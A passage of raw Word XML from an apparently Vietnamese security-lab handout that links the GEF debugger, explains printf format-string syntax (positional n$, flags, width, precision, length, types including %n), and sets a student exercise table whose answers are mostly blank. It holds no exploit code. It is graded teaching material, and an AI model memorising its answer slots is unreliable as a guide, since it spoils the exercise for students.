      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00AD3FAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://github.com/hugsy/gef</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7CB5C" w14:textId="20316C01" w:rsidR="007454F1" w:rsidRDefault="007454F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:kern w:val="28"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A739611" w14:textId="38F1B58A" w:rsidR="000C7F39" w:rsidRPr="00AD4CCE" w:rsidRDefault="00946C14" w:rsidP="00F20ED0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>THỰC HÀNH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAC8B0" w14:textId="4558C54A" w:rsidR="00752BA0" w:rsidRDefault="00946C14" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Tìm hiểu về </w:t>
      </w:r>
      <w:r w:rsidR="00DB1F52">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>chuỗi định dạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B819A44" w14:textId="548AD1DD" w:rsidR="00946C14" w:rsidRPr="00946C14" w:rsidRDefault="00946C14" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Một chuỗi định dạng thường có các thành phần cấu thành như bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9530"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B6FC5" w14:paraId="655709F1" w14:textId="77777777" w:rsidTr="009B6FC5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C8E070" w14:textId="0D200D05" w:rsidR="009B6FC5" w:rsidRDefault="009B6FC5" w:rsidP="009B6FC5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>%[parameter][flags][width][.precision][length]type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C7DD8F4" w14:textId="1C582578" w:rsidR="00946C14" w:rsidRPr="00946C14" w:rsidRDefault="00946C14" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00946C14">
        <w:t>Trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA53188" w14:textId="5A7ACBA5" w:rsidR="00853258" w:rsidRPr="00857A79" w:rsidRDefault="00885638" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00946C14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00853258" w:rsidRPr="00946C14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>arameter</w:t>
      </w:r>
      <w:r w:rsidR="00846388" w:rsidRPr="00946C14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00946C14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">có dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00946C14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n$,</w:t>
      </w:r>
      <w:r w:rsidR="00143062">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">với n là </w:t>
      </w:r>
      <w:r w:rsidR="00143062">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">số thứ tự </w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">của </w:t>
      </w:r>
      <w:r w:rsidR="00143062">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tham số</w:t>
      </w:r>
      <w:r w:rsidR="00C63BFC">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cần sử dụng với định dạng</w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A207D6D" w14:textId="73CFF57D" w:rsidR="00857A79" w:rsidRDefault="00857A79" w:rsidP="00946C14">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">flags: </w:t>
      </w:r>
      <w:r w:rsidR="00F473D7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>- để căn trái cho đầu ra, +</w:t>
      </w:r>
      <w:r w:rsidR="00C91E7E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/space</w:t>
      </w:r>
      <w:r w:rsidR="00F473D7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để thêm dấu +</w:t>
      </w:r>
      <w:r w:rsidR="00C91E7E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/space</w:t>
      </w:r>
      <w:r w:rsidR="00F473D7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho số dương</w:t>
      </w:r>
      <w:r w:rsidR="00C91E7E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, 0 dùng chung với width để chèn thêm số 0 nếu độ dài chưa đủ</w:t>
      </w:r>
      <w:r w:rsidR="00D20CAE">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19338937" w14:textId="6E9DBACD" w:rsidR="009B6FC5" w:rsidRDefault="00362BF7" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">width: </w:t>
      </w:r>
      <w:r w:rsidR="00D20CAE">
        <w:t xml:space="preserve">số ký tự tối thiểu sẽ được in </w:t>
      </w:r>
      <w:r w:rsidR="00B825C8">
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FC6D98">
        <w:t xml:space="preserve"> là 1 số nguyên</w:t>
      </w:r>
      <w:r w:rsidR="006B1E02">
        <w:t>. G</w:t>
      </w:r>
      <w:r w:rsidR="00FC6D98">
        <w:t xml:space="preserve">iá trị </w:t>
      </w:r>
      <w:r w:rsidR="00F12C53">
        <w:t xml:space="preserve">có thể </w:t>
      </w:r>
      <w:r w:rsidR="00FC6D98">
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00E10E92">
        <w:t>ược thêm động dưới dạng tham số với ký hiệu * trong chuỗi định dạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C92B49" w14:textId="48A7DFA9" w:rsidR="00362BF7" w:rsidRDefault="001E68C7" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00900501">
        <w:t>precision:</w:t>
      </w:r>
      <w:r w:rsidR="00145380">
        <w:t xml:space="preserve"> Nếu là số nguyên, đây là số chữ số tối thiểu sẽ được in ra,</w:t>
      </w:r>
      <w:r w:rsidR="00060ECE">
        <w:t xml:space="preserve"> nếu không đủ</w:t>
      </w:r>
      <w:r w:rsidR="00900501">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D144F">
        <w:t xml:space="preserve">sẽ thêm số 0. </w:t>
      </w:r>
      <w:r w:rsidR="00553226">
        <w:t>Nếu là số thực, đây là số lượng chữ số của phần thập phân</w:t>
      </w:r>
      <w:r w:rsidR="003944A0">
        <w:t xml:space="preserve"> sẽ được in ra</w:t>
      </w:r>
      <w:r w:rsidR="0009044E">
        <w:t>, nếu không đủ sẽ thêm số 0</w:t>
      </w:r>
      <w:r w:rsidR="00A04956">
        <w:t>. Nếu là chuỗi, đây là giới hạn số ký tự cần in</w:t>
      </w:r>
      <w:r w:rsidR="00CC2F04">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007A30A7">
        <w:t xml:space="preserve">Có thể là 1 số nguyên hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00CC2F04">
        <w:t>có thể thêm động với ký hiệu *.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DD47A" w14:textId="240CADD6" w:rsidR="0096484F" w:rsidRDefault="0096484F" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidR="007646C0">
        <w:t>: chiều dài của đầu ra</w:t>
      </w:r>
      <w:r w:rsidR="00CC2F04">
        <w:t xml:space="preserve"> với các dạng hh, h, l, ll, L, z...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D0630" w14:textId="56F318C4" w:rsidR="00FF7F9B" w:rsidRDefault="0044093A" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>type:</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F12C53">
        <w:t>liên quan đến kiểu dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00BD68A3">
        <w:t xml:space="preserve"> số nguyên (số hay hexan), chuỗi, số thực, ký tự,..:</w:t>
      </w:r>
      <w:r w:rsidR="00643737">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>d/</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t xml:space="preserve">I, </w:t>
      </w:r>
      <w:r w:rsidR="00DF7E94">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005F6CDE">
        <w:t>x/X</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003C7FE9">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001D1548">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="001D1548">
        <w:t>, p, n, %.</w:t>
      </w:r>
      <w:r w:rsidR="006D5322">
        <w:t xml:space="preserve"> </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647D18" w14:paraId="7F33D05A" w14:textId="77777777" w:rsidTr="006E37B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9747" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="182C8695" w14:textId="05D0DCE1" w:rsidR="00647D18" w:rsidRPr="00EE27A7" w:rsidRDefault="00647D18" w:rsidP="006E37B3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Giả sử cần chuẩn bị chuỗi định dạng cho printf(). Sinh viên tìm hiểu và hoàn thành các chuỗi định dạng cần sử dụng để thực hiện các yêu cầu bên dưới.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C96B178" w14:textId="0EA666AA" w:rsidR="00647D18" w:rsidRPr="00973B1A" w:rsidRDefault="00647D18" w:rsidP="00647D18">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6799"/>
        <w:gridCol w:w="2731"/>
      </w:tblGrid>
      <w:tr w:rsidR="00647D18" w14:paraId="01372D11" w14:textId="77777777" w:rsidTr="009060A7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15544CF5" w14:textId="58AFC371" w:rsidR="00647D18" w:rsidRPr="00370900" w:rsidRDefault="00647D18" w:rsidP="006E37B3">
            <w:pPr>
              <w:pStyle w:val="Content"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E19073A" w14:textId="3D719B15" w:rsidR="00647D18" w:rsidRPr="00370900" w:rsidRDefault="00647D18" w:rsidP="006E37B3">
            <w:pPr>
              <w:pStyle w:val="Content"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Chuỗi định dạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647D18" w14:paraId="5B868B45" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC8955B" w14:textId="013F6828" w:rsidR="00647D18" w:rsidRPr="009060A7" w:rsidRDefault="00647D18" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>In ra 1 số nguyên</w:t>
            </w:r>
            <w:r w:rsidR="005B77E7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> hệ thập phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76169607" w14:textId="3DA8F349" w:rsidR="00647D18" w:rsidRPr="00A56F03" w:rsidRDefault="00647D18" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A56F03">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>%d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647D18" w14:paraId="7F432E87" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5399B24D" w14:textId="6BB7674A" w:rsidR="00647D18" w:rsidRPr="009060A7" w:rsidRDefault="00647D18" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>In ra 1 số nguyên 4 byte</w:t>
            </w:r>
            <w:r w:rsidR="005B77E7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> hệ thập lục phân</w:t>
            </w:r>
            <w:r w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>, trong đó luôn in đủ 8 số hexan</w:t>
            </w:r>
            <w:r w:rsidR="00A56F03" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A5A24D0" w14:textId="77777777" w:rsidR="00647D18" w:rsidRPr="00A56F03" w:rsidRDefault="00647D18" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006263F0" w14:paraId="444DEB20" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECDB736" w14:textId="5D993D86" w:rsidR="006263F0" w:rsidRPr="009060A7" w:rsidRDefault="00761E57" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>In ra số nguyên dương</w:t>
            </w:r>
            <w:r w:rsidR="00CE45D6">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> có ký hiệu + phía trước</w:t>
            </w:r>
            <w:r w:rsidR="00CE45D6">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> và chiếm ít nhất </w:t>
            </w:r>
            <w:r w:rsidR="00854FBC">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>5 ký tự</w:t>
            </w:r>
            <w:r w:rsidR="00BA26B1">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>, nếu không đủ thì thêm ký tự 0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74FA6051" w14:textId="77777777" w:rsidR="006263F0" w:rsidRPr="00A56F03" w:rsidRDefault="006263F0" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647D18" w14:paraId="244A8BCB" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5CF19F" w14:textId="2CD0AE3A" w:rsidR="00647D18" w:rsidRPr="009060A7" w:rsidRDefault="0263614D" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">In </w:t>
            </w:r>
            <w:r w:rsidR="64F03BA4" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">tối đa chuỗi </w:t>
            </w:r>
            <w:r w:rsidR="001179A2">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="64F03BA4" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> ký tự</w:t>
            </w:r>
            <w:r w:rsidR="00C35F0A">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>, nếu dư sẽ cắt bớt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BAE2EEA" w14:textId="77777777" w:rsidR="00647D18" w:rsidRPr="00A56F03" w:rsidRDefault="00647D18" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647D18" w14:paraId="4420F3C8" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D932D9" w14:textId="4CE8630C" w:rsidR="3EA2B276" w:rsidRPr="009060A7" w:rsidRDefault="00441F34" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>In ra 1 số thực, trong đó đ</w:t>
            </w:r>
            <w:r w:rsidR="3EA2B276" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>ầu ra sẽ chiếm ít nhất 7 ký tự</w:t>
            </w:r>
            <w:r w:rsidR="009A4E89">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> và </w:t>
            </w:r>
            <w:r w:rsidR="00A9349C">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
